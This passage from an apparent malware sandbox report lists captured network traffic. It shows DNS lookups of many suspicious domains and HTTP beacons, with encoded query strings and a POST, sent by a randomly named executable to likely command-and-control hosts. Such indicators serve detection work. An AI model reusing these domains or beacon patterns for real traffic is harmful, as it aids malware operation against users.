                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:17.198030949 CEST4981080192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:17.292772055 CEST8049810104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:17.776850939 CEST8049810104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:17.777185917 CEST8049810104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:17.777329922 CEST4981080192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:17.777548075 CEST8049810104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:17.777760029 CEST4981080192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:17.780508041 CEST4981080192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:17.875073910 CEST8049810104.21.50.202192.168.11.20

                                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.064939022 CEST5406853192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.305181026 CEST53540681.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.235928059 CEST5591453192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.495575905 CEST53559141.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:41.912565947 CEST5733153192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.076791048 CEST53573311.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:57.333925009 CEST6276453192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:58.204668045 CEST53627641.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:12.800262928 CEST6172453192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:12.906807899 CEST53617241.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:20.969412088 CEST5484853192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.237102985 CEST53548481.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:34.529304028 CEST6089853192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:35.085568905 CEST53608981.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.414864063 CEST5236253192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.524482012 CEST53523621.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.630697966 CEST5675653192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.734040022 CEST53567561.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.502918959 CEST5849453192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.625303984 CEST53584941.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:48.249802113 CEST5654453192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.037494898 CEST53565441.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.199825048 CEST6192853192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.304303885 CEST53619281.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:16.400068998 CEST5789453192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:16.501738071 CEST53578941.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:43.409560919 CEST6088553192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:43.943345070 CEST53608851.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:57.640902996 CEST6253253192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:57.979638100 CEST53625321.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:11.356589079 CEST5685353192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:11.458760023 CEST53568531.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:24.603735924 CEST5568853192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:24.804794073 CEST53556881.1.1.1192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:02.313023090 CEST4997053192.168.11.201.1.1.1
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:02.417005062 CEST53499701.1.1.1192.168.11.20

                                                                                                                                                                                                                                                              ICMP Packets

                                                                                                                                                                                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:35.396053076 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:36.396537066 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:38.411740065 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:42.426450014 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:50.440454960 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:57.472563028 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:58.485208988 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:00.500674009 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:04.515530109 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:12.529485941 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:19.561836004 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:20.574687958 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:22.589715004 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:26.604185104 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:34.618849039 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:41.650212049 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:42.647685051 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:44.662600994 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:48.677429914 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:37:56.692219973 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:24.068800926 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:25.081676006 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:27.099838972 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:31.115401983 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:39.126018047 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:46.161107063 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:47.171041012 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:49.185767889 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:53.200917959 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:01.215687037 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:08.246737003 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:09.259737968 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:11.274635077 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:15.289490938 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:23.304092884 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:30.335432053 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:31.348319054 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:33.365021944 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:37.378535032 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:45.392522097 CEST23.231.158.3192.168.11.207ec3(Unknown)Destination Unreachable

                                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.064939022 CEST192.168.11.201.1.1.10xffe6Standard query (0)secretspark.com.bdA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.235928059 CEST192.168.11.201.1.1.10x8c8fStandard query (0)www.groupriam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:41.912565947 CEST192.168.11.201.1.1.10xff6eStandard query (0)www.foundation-repair.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:57.333925009 CEST192.168.11.201.1.1.10x5f8Standard query (0)www.asa-malukuutara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:12.800262928 CEST192.168.11.201.1.1.10xa159Standard query (0)www.sedezne-blazine.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:20.969412088 CEST192.168.11.201.1.1.10x2954Standard query (0)www.meetfactory.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:34.529304028 CEST192.168.11.201.1.1.10x3cc3Standard query (0)www.518729.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.414864063 CEST192.168.11.201.1.1.10x8846Standard query (0)www.cachsoicautdtc.bestA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.630697966 CEST192.168.11.201.1.1.10x94faStandard query (0)www.itemfilterhub.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.502918959 CEST192.168.11.201.1.1.10x5fe4Standard query (0)www.bullbord.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:48.249802113 CEST192.168.11.201.1.1.10x2549Standard query (0)www.cannulafactory.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.199825048 CEST192.168.11.201.1.1.10xab17Standard query (0)www.7ddw.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:16.400068998 CEST192.168.11.201.1.1.10x9285Standard query (0)www.home-check.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:43.409560919 CEST192.168.11.201.1.1.10x753fStandard query (0)www.emeluzunmoda.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:57.640902996 CEST192.168.11.201.1.1.10x696eStandard query (0)www.ayypromo.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:11.356589079 CEST192.168.11.201.1.1.10x2502Standard query (0)www.magicface.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:24.603735924 CEST192.168.11.201.1.1.10x2b73Standard query (0)www.hypepgbet.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:02.313023090 CEST192.168.11.201.1.1.10x9e5Standard query (0)www.sedezne-blazine.shopA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.305181026 CEST1.1.1.1192.168.11.200xffe6No error (0)secretspark.com.bd170.249.236.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.495575905 CEST1.1.1.1192.168.11.200x8c8fNo error (0)www.groupriam.comgroupriam.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.495575905 CEST1.1.1.1192.168.11.200x8c8fNo error (0)groupriam.com199.103.62.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.076791048 CEST1.1.1.1192.168.11.200xff6eNo error (0)www.foundation-repair.biz199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:58.204668045 CEST1.1.1.1192.168.11.200x5f8No error (0)www.asa-malukuutara.comasa-malukuutara.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:58.204668045 CEST1.1.1.1192.168.11.200x5f8No error (0)asa-malukuutara.com103.247.8.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:12.906807899 CEST1.1.1.1192.168.11.200xa159Name error (3)www.sedezne-blazine.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.237102985 CEST1.1.1.1192.168.11.200x2954No error (0)www.meetfactory.biz72.14.178.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.237102985 CEST1.1.1.1192.168.11.200x2954No error (0)www.meetfactory.biz72.14.185.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.237102985 CEST1.1.1.1192.168.11.200x2954No error (0)www.meetfactory.biz45.33.30.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.237102985 CEST1.1.1.1192.168.11.200x2954No error (0)www.meetfactory.biz45.33.18.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.237102985 CEST1.1.1.1192.168.11.200x2954No error (0)www.meetfactory.biz96.126.123.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.237102985 CEST1.1.1.1192.168.11.200x2954No error (0)www.meetfactory.biz173.255.194.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.237102985 CEST1.1.1.1192.168.11.200x2954No error (0)www.meetfactory.biz45.33.2.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.237102985 CEST1.1.1.1192.168.11.200x2954No error (0)www.meetfactory.biz45.33.20.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.237102985 CEST1.1.1.1192.168.11.200x2954No error (0)www.meetfactory.biz45.56.79.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.237102985 CEST1.1.1.1192.168.11.200x2954No error (0)www.meetfactory.biz45.79.19.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.237102985 CEST1.1.1.1192.168.11.200x2954No error (0)www.meetfactory.biz198.58.118.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:21.237102985 CEST1.1.1.1192.168.11.200x2954No error (0)www.meetfactory.biz45.33.23.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:36:35.085568905 CEST1.1.1.1192.168.11.200x3cc3No error (0)www.518729.xyz23.231.158.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.524482012 CEST1.1.1.1192.168.11.200x8846No error (0)www.cachsoicautdtc.best172.67.191.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:07.524482012 CEST1.1.1.1192.168.11.200x8846No error (0)www.cachsoicautdtc.best104.21.84.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.734040022 CEST1.1.1.1192.168.11.200x94faNo error (0)www.itemfilterhub.shop104.21.50.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:20.734040022 CEST1.1.1.1192.168.11.200x94faNo error (0)www.itemfilterhub.shop172.67.166.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:34.625303984 CEST1.1.1.1192.168.11.200x5fe4No error (0)www.bullbord.top203.161.46.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.037494898 CEST1.1.1.1192.168.11.200x2549No error (0)www.cannulafactory.topshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:49.037494898 CEST1.1.1.1192.168.11.200x2549No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.304303885 CEST1.1.1.1192.168.11.200xab17No error (0)www.7ddw.top7ddw.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:02.304303885 CEST1.1.1.1192.168.11.200xab17No error (0)7ddw.top154.23.184.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:16.501738071 CEST1.1.1.1192.168.11.200x9285No error (0)www.home-check.shop185.230.15.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:43.943345070 CEST1.1.1.1192.168.11.200x753fNo error (0)www.emeluzunmoda.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:43.943345070 CEST1.1.1.1192.168.11.200x753fNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:43.943345070 CEST1.1.1.1192.168.11.200x753fNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:57.979638100 CEST1.1.1.1192.168.11.200x696eNo error (0)www.ayypromo.shop176.57.64.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:11.458760023 CEST1.1.1.1192.168.11.200x2502No error (0)www.magicface.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:11.458760023 CEST1.1.1.1192.168.11.200x2502No error (0)www.magicface.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:24.804794073 CEST1.1.1.1192.168.11.200x2b73No error (0)www.hypepgbet.online82.112.244.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:02.417005062 CEST1.1.1.1192.168.11.200x9e5Name error (3)www.sedezne-blazine.shopnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                                              • secretspark.com.bd
                                                                                                                                                                                                                                                              • www.groupriam.com
                                                                                                                                                                                                                                                              • www.foundation-repair.biz
                                                                                                                                                                                                                                                              • www.asa-malukuutara.com
                                                                                                                                                                                                                                                              • www.meetfactory.biz
                                                                                                                                                                                                                                                              • www.cachsoicautdtc.best
                                                                                                                                                                                                                                                              • www.itemfilterhub.shop
                                                                                                                                                                                                                                                              • www.bullbord.top
                                                                                                                                                                                                                                                              • www.cannulafactory.top
                                                                                                                                                                                                                                                              • www.7ddw.top
                                                                                                                                                                                                                                                              • www.home-check.shop
                                                                                                                                                                                                                                                              • www.emeluzunmoda.online
                                                                                                                                                                                                                                                              • www.ayypromo.shop

                                                                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.11.2049740199.59.243.22780900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.183563948 CEST558OUTGET /enra/?FlS=3ldH5dkH-dBLf&9B6h=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ= HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.foundation-repair.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.285993099 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:35:41 GMT
                                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              content-length: 1486
                                                                                                                                                                                                                                                              x-request-id: 80b80f22-4f1c-4b99-a851-3c25ba91d834
                                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oBVEXdhsBCDDxl0D0YLxmHCBIJ9m739bFUg3BT4nH3PlKz4dxKmTpxz7Bn9b8YH9XjizRdAN5Bhrs+NoUApGgQ==
                                                                                                                                                                                                                                                              set-cookie: parking_session=80b80f22-4f1c-4b99-a851-3c25ba91d834; expires=Wed, 09 Oct 2024 11:50:42 GMT; path=/
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 42 56 45 58 64 68 73 42 43 44 44 78 6c 30 44 30 59 4c 78 6d 48 43 42 49 4a 39 6d 37 33 39 62 46 55 67 33 42 54 34 6e 48 33 50 6c 4b 7a 34 64 78 4b 6d 54 70 78 7a 37 42 6e 39 62 38 59 48 39 58 6a 69 7a 52 64 41 4e 35 42 68 72 73 2b 4e 6f 55 41 70 47 67 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oBVEXdhsBCDDxl0D0YLxmHCBIJ9m739bFUg3BT4nH3PlKz4dxKmTpxz7Bn9b8YH9XjizRdAN5Bhrs+NoUApGgQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:42.286077023 CEST886INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                                                                                                                                                              Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODBiODBmMjItNGYxYy00Yjk5LWE4NTEtM2MyNWJhOTFkODM0IiwicGFnZV90aW1lIjoxNzI4NDczNzQyLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZm91bmRhdGlvbi1yZXB


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              1192.168.11.2049741103.247.8.5380900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:58.580940962 CEST832OUTPOST /21hf/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.asa-malukuutara.com/21hf/
